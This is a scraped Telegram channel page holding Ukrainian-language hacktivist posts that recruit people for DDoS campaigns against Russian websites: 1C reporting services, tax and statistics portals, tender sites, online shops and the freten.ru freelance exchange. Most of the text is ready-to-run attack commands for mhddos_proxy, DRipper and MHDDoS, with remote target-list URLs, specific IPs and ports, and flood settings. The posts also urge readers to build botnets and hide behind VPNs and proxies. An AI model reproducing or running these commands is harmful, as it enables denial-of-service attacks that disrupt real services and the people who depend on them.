cookie

Utilizamos cookies para mejorar tu experiencia de navegación. Al hacer clic en "Aceptar todo", aceptas el uso de cookies.

avatar

За рідну Україну!

Прошу усіх, розповсюджуйте цю групу своїм знайомим, чим більше нас, тим більше шансів вбити наглухо усі російські сайти! Кидайте посилання у студентські групи університетів, шкіл! Слава Україні!

Mostrar más
El país no está especificadoEl idioma no está especificadoLa categoría no está especificada
Advertising posts
179Suscriptores
Sin datos24 hours
Sin datos7 days
Sin datos30 days

Carga de datos en curso...

Tasa de crecimiento de suscriptores

Carga de datos en curso...

🔥Атакуємо багато різних сайтів РФ на тему 9-го травня🔥 сам конфіг з усіма цілями для ознайомлення можете глянути тут: https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l7_url ❗️Ці цілі також додані у наші автоматизовані скрипти, які самостійно оновлюються, тобто для них вам міняти нічого не потрібно ❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990 ❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN, щоб ваш провайдер не різав трафік через підключення до багатьох ІР(проксі) ❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + розвідка цілей) тепер зібрано тут ❗️Щоб додати ваш поточний ІР (або ІР підключеного VPN) до атаки разом з проксі у кінець команди приписуйте --vpn, більше детально про це тут: https://t.me/ddos_separ/1172 ❗️DDoS рашистів через телеграм: https://t.me/ddos_separ/1177 ✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку): 🔹ПРІОРИТЕТ атака по L7: python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l7_url -t 3000 --rpc 3000 --http-methods GET POST --debug 🔹Атака по L4 tcp: python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l4_tcp -t 3000 --rpc 3000 --debug ✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo: 🔹ПРІОРИТЕТ Атака по L7: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l7_url -t 3000 --rpc 3000 --http-methods GET STRESS --debug 🔹Атака по L4 tcp: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l4_tcp -t 3000 --rpc 3000 --debug 🟢DRipper (вийшла нова версія): 🔸Атака по L7: python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l7_url 🔸Атака по L4 tcp: python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l4_tcp 🟢Docker (DRipper) Windows / Для Linux додайте sudo: 🔸Атака по L7: docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l7_url 🔸Атака по L4 tcp: docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l4_tcp 💙Погнали - дамо їм жару💛
Mostrar todo...
🔥Як тему вихідного дня у цей раз візьмемо інтернет-магазини (про ЕГАИС теж не забули - вони є у конфігу)🔥 сам конфіг з усіма цілями для ознайомлення можете глянути тут: https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l7_url ❗️Ці цілі також додані у наші автоматизовані скрипти, які самостійно оновлюються, тобто для них вам міняти нічого не потрібно ❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990 ❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN, щоб ваш провайдер не різав трафік через підключення до багатьох ІР(проксі) ❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + розвідка цілей) тепер зібрано тут ❗️Щоб додати ваш поточний ІР (або ІР підключеного VPN) до атаки разом з проксі у кінець команди приписуйте --vpn, більше детально про це тут: https://t.me/ddos_separ/1172 ❗️DDoS рашистів через телеграм: https://t.me/ddos_separ/1177 ✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку): 🔹ПРІОРИТЕТ атака по L7: python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l7_url -t 3000 --rpc 3000 --http-methods GET STRESS --debug 🔹Атака по L4 tcp: python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l4_tcp -t 3000 --rpc 3000 --debug ✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo: 🔹ПРІОРИТЕТ Атака по L7: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l7_url -t 3000 --rpc 3000 --http-methods GET STRESS --debug 🔹Атака по L4 tcp: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l4_tcp -t 3000 --rpc 3000 --debug 🟢DRipper (вийшла нова версія): 🔸Атака по L7: python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l7_url 🔸Атака по L4 tcp: python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l4_tcp 🟢Docker (DRipper) Windows / Для Linux додайте sudo: 🔸Атака по L7: docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l7_url 🔸Атака по L4 tcp: docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l4_tcp 💙Погнали - дамо їм жару💛
Mostrar todo...
🔥Сьогодні атакуємо тендери РФ 🔥 ❗️Ці цілі також додані у наші автоматизовані скрипти, які самостійно оновлюються, тобто для них вам міняти нічого не потрібно ❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990 ❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN, щоб ваш провайдер не різав трафік через підключення до багатьох ІР(проксі) ❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + розвідка цілей) тепер зібрано тут ❗️Щоб додати ваш поточний ІР (або ІР підключеного VPN) до атаки разом з проксі у кінець команди приписуйте --vpn, більше детально про це тут: https://t.me/ddos_separ/1172 ❗️DDoS рашистів через телеграм: https://t.me/ddos_separ/1177 ✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку): 🔹ПРІОРИТЕТ атака по L7:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l7_url -t 4000 --rpc 4000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l4_tcp -t 4000 --rpc 4000 --debug

✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo: 🔹ПРІОРИТЕТ Атака по L7:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l7_url -t 4000 --rpc 4000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l4_tcp -t 4000 --rpc 4000 --debug

🟢DRipper (вийшла нова версія): 🔸Атака по L7:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l7_url
🔸Атака по L4 tcp:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l4_tcp

🟢Docker (DRipper) Windows / Для Linux додайте sudo: 🔸Атака по L7:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l7_url
🔸Атака по L4 tcp:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l4_tcp

💙Погнали - дамо їм жару💛
Mostrar todo...
Автоматичний DDoS new

АВТОМАТИЧНИЙ DDOS НА WINDOWS / MAC / ANROID / LINUX (ОСНОВА + СЕРВЕР(навіть при вимкненому комп’ютері)) Стаття створенна, щоб зібрати основні автоматичні методи ДДоСу, та, щоб кожен користувач міг зробити великий БотНет на 50 машин

🔥Сьогодні переключаємося на атаку тендерів та торгів (ЕГАИС також додано у конфіги)🔥
Mostrar todo...
🔥Атакуємо звітність 1C в РФ🔥 ❗️Ці цілі також додані у наші автоматизовані скрипти, які самостійно оновлюються, тобто для них вам міняти нічого не потрібно ❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990 ❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN, щоб ваш провайдер не різав трафік через підключення до багатьох ІР(проксі) ❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + розвідка цілей) тепер зібрано тут ❗️Щоб додати ваш поточний ІР (або ІР підключеного VPN) до атаки разом з проксі у кінець команди приписуйте --vpn, більше детально про це тут: https://t.me/ddos_separ/1172 ✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку): 🔹ПРІОРИТЕТ атака по L7 URL:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L7 http(s)://IP:PORT:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug

✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo: 🔹ПРІОРИТЕТ Атака по L7 URL:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug

🟢DRipper (вийшла нова версія): 🔸Атака по L7 URL:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url
🔸Атака по L7 http(s)://IP:PORT:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http
🔸Атака по L4 tcp:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp

🟢Docker (DRipper) Windows / Для Linux додайте sudo: 🔸Атака по L7 URL:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url
🔸Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http
🔸Атака по L4 tcp:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp

💙Погнали - дамо їм жару💛
Mostrar todo...
🔥До конфігу цілей по звітності додано ще й ЕГАИС, тому продовжуємо атаку і сьогодні🔥
Mostrar todo...
🔥Атакуємо звітність 1C в РФ🔥 https://1c.ru/ https://downloads.v8.1c.ru https://login.1c.ru/login https://reputils.1c.ru https://invitations.1c-edo.keydisk.ru/ http://online.1c.ru/catalog/products/ https://1csoft.ru/wherebuy https://www.cryptopro.ru/downloads https://regservice.keydisk.ru http://regservice.keydisk.ru:8092 https://service.fsrar.ru http://frap.fsrar.ru http://gibdd.fsrar.ru/ https://service.alcolicenziat.ru/auth/login http://f4.fss.ru http://docs.fss.ru https://lk.fss.ru https://websbor.gks.ru/online https://online.gks.ru/online https://updateids2.infotecs.ru https://kontur.ru https://auth.kontur.ru/ https://ofd.kontur.ru ❗️Ці цілі також додані у наші автоматизовані скрипти ❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990 ❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN ❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + Розвідка цілей) тепер зібрано тут ❗️Вийшла нова покращена версія mhddos_proxy, рекомендую оновити (обирайте інструкцію для вашої ОС та гортайте до пункту Запуск команд / атаки): https://t.me/ddos_separ/990 (для Linux-серверів та авто-скриптів нічого не потрібно змінювати - воно оновлюється повністю самостійно) ❗️Ви можете допомогти нам у зборі проксі (це безкоштовно і не відніме у вас більше 30 хвилин часу на день): https://t.me/ddos_separ/1164 ✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку): 🔹ПРІОРИТЕТ атака по L7 URL:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L7 http(s)://IP:PORT:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug

✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo: 🔹ПРІОРИТЕТ Атака по L7 URL:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug

🟢DRipper (вийшла нова версія): 🔸Атака по L7 URL:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url
🔸Атака по L7 http(s)://IP:PORT:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http
🔸Атака по L4 tcp:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp

🟢Docker (DRipper) Windows / Для Linux додайте sudo: 🔸Атака по L7 URL:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url
🔸Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http
🔸Атака по L4 tcp:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp

💙Погнали - дамо їм жару💛
Mostrar todo...
🔥Атакуємо звітність 1C в РФ🔥 https://1c.ru/ https://downloads.v8.1c.ru https://login.1c.ru/login https://reputils.1c.ru https://invitations.1c-edo.keydisk.ru/ http://online.1c.ru/catalog/products/ https://1csoft.ru/wherebuy https://www.cryptopro.ru/downloads https://regservice.keydisk.ru http://regservice.keydisk.ru:8092 https://service.fsrar.ru http://frap.fsrar.ru http://gibdd.fsrar.ru/ https://service.alcolicenziat.ru/auth/login http://f4.fss.ru http://docs.fss.ru https://lk.fss.ru https://websbor.gks.ru/online https://online.gks.ru/online https://updateids2.infotecs.ru https://kontur.ru https://auth.kontur.ru/ https://ofd.kontur.ru ❗️Ці цілі також додані у наші автоматизовані скрипти ❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990 ❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN ❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + Розвідка цілей) тепер зібрано тут ❗️Вийшла нова покращена версія mhddos_proxy, рекомендую оновити (обирайте інструкцію для вашої ОС та гортайте до пункту Запуск команд / атаки): https://t.me/ddos_separ/990 (для Linux-серверів та авто-скриптів нічого не потрібно змінювати - воно оновлюється повністю самостійно) ❗️Ви можете допомогти нам у зборі проксі (це безкоштовно і не відніме у вас більше 30 хвилин часу на день): https://t.me/ddos_separ/1164 ✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку): 🔹ПРІОРИТЕТ атака по L7 URL:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L7 http(s)://IP:PORT:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug

✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo: 🔹ПРІОРИТЕТ Атака по L7 URL:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug

🟢DRipper (вийшла нова версія): 🔸Атака по L7 URL:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url
🔸Атака по L7 http(s)://IP:PORT:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http
🔸Атака по L4 tcp:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp

🟢Docker (DRipper) Windows / Для Linux додайте sudo: 🔸Атака по L7 URL:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url
🔸Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http
🔸Атака по L4 tcp:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp

💙Погнали - дамо їм жару💛
Mostrar todo...
🔥Знайшли таку інформацію по звітності, тому атакуємо сьогодні їх звітність знову🔥
Mostrar todo...
Знову всіх вітаю, сподіваюсь, ви готові?😏 Атакуємо російську фріланс біржу Фретен — не найпопулярніший сервіс, але через нього теж багато людей працюють, і потік грошей там великий. Такі сервіси, зазвичай, платять налоги в держ. казну РФ, а значить фінансово підтримують ворога. Думаю більше розповідати тут нічого. ЧАВИМО РАШИСТІВ🤬 freten.ru robroy.ru 37.46.131.229 [21/TCP, 22/TCP, 443/TCP, 1500/TCP] —> сайт* [53/UDP, 123/UDP] mail.freten.ru mail.robroy.ru 37.46.131.229 [25/smtp, 110/pop3, 143/imap, 465/ssl/smtp, 587/smtp, 993/ssl/imap, 995/ssl/pop3] —> пошта* 82.146.43.2 94.250.248.160 [53/UDP] —> DNS-servers* Команда для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://freten.ru https://mail.freten.ru https://robroy.ru https://mail.robroy.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table Команда для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py https://freten.ru https://mail.freten.ru https://robroy.ru https://mail.robroy.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table Команди для MHDDoS:
python3 start.py UDP 37.46.131.229:53 5000 10000 true
python3 start.py UDP 94.250.248.160:53 5000 10000 true
python3 start.py UDP 82.146.43.2:53 5000 10000 true

python3 start.py UDP 37.46.131.229:123 5000 10000 true
(тут синхронізація часу(123 порт), тому не пріорітетна команда)* python3 start.py STRESS https://freten.ru 6 1000 proxy.txt 10000 5000 true python3 start.py STRESS https://robroy.ru 6 1000 proxy.txt 10000 5000 true python3 start.py POST https://mail.freten.ru 6 1000 proxy.txt 10000 5000 true python3 start.py POST https://mail.robroy.ru 6 1000 proxy.txt 10000 5000 true
Mostrar todo...
Inicia sesión y accede a información detallada

Te revelaremos estos tesoros después de la autorización. ¡Prometemos que será rápido!